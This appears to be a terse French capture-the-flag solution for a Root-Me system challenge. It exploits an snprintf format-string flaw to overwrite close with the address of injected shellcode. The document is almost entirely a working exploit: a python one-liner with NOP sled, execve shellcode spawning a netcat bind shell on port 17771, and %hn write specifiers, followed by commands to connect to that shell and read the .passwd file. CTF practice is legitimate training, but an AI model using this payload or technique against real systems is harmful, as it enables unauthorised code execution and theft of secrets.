#faille de snprintf qui permet d'ecrire dans la memoire
#grace a ca, on va emplacer l'adresse du close par l'adresse correspondant a notre scriptshell

python -c "print '\x48\xa0\x04\x08' + '\x4a\xa0\x04\x08' + '\x90'*80 + '\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80' + '%49005x%6\$hn%13329x%5\$hn'" | nc challenge02.root-me.org 56032

lancer dans un autre terminal l'exo

nc 127.0.0.1 17771

cd /challenge/app-systeme/ch32
cat .passwd
